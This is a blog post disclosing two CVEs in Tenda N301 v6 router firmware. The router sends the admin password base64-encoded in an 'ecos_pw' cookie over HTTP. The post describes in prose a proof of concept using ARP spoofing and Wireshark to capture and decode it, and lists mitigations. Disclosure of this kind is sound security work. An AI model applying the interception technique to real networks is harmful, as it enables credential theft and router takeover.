Open in app

Sign in

Write

Sign in

TENDA–N301-v6–(CVE-2023–29680,CVE-2023–29681)

Mateus Pantoja
3 min readApr 30, 2023

--

This post describes two weak-code implementations on Tenda routers using firmware v12.02.01.61_multi and firmware v12.03.01.06_pt, router version N301 from Tenda technology.

Description

An Weak Encoding implementation is used in the Tenda N301v6 router when storing the password used to authenticate to the equipment, and the two firmwares do not implement settings that enable the use of https.

Firmware: V12.03.01.06_pt (CVE-2023–29680)
Firmware: V12.02.01.61_multi (CVE-2023–29681)

The base64 encoded password sent via cookie in the name-value pair attribute “cookie:ecos_pw=”(Firmware: V12.03.01.06_pt) and “set-cookie:ecos_pw=”(Firmware: V12.02.01.61_multi). This flaw allows an authenticated attacker on the LAN or WLAN to intercept communications with the router via arp spoofing and obtain the password that is passed in the request header via cookie in the “ecos_pw=” attribute, making it possible to capture the encryption.

Test scenario
Test scenario

If the password is successfully captured, the attacker is able to log into the equipment and set a new password, and it is possible to perform actions that interrupt the use of the network permanently.

POC

Using an ARP spoofing technique to forward spoofed packets to the router, it is possible to intercept the communication using wireshark and thus obtain the credentials that were used when logging into the router.

sending fake packets

Credential obtained after packet interception, Firmware: V12.03.01.06_en (CVE-2023–29680)

Credential obtained after packet interception, Firmware: V12.03.01.06_en (CVE-2023–29680)

Credential obtained after packet interception, Firmware: V12.02.01.61_multi (CVE-2023–29681)

Credential obtained after packet interception, Firmware: V12.02.01.61_multi (CVE-2023–29681)

The credential is passed using base64, so it is possible to decode and login to the router.

Below is the link to the videos showing the exploration in both firmwares.

POC_TENDA_N301_V6_firmware:V12.03.01.06.pt
POC_TENDA_N301_V6_firmware-V12.02.01.61.multi

The PoC ends here.

As I said the poc ended here, below I make some observations.

This vulnerability was only possible because some important features were not implemented to ensure the security of the home user.

  • Possibility to switch from HTTP to HTTPS
  • Session management to avoid more than one admin connected at the same time
  • Use of secure hash algorithms

Well, that’s it, this is my publication about CVEs and I believe this little contribution is useful for the cybersecurity community o/

Thanks and keep hacking !!!!!!!

Cve
Hacking
Cybersecurity
Pentesting
Vulnerability

--

--

Mateus Pantoja

Written by Mateus Pantoja

5 Followers

Hi, I'm just a student and professional in the security area trying to share some knowledge =D

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams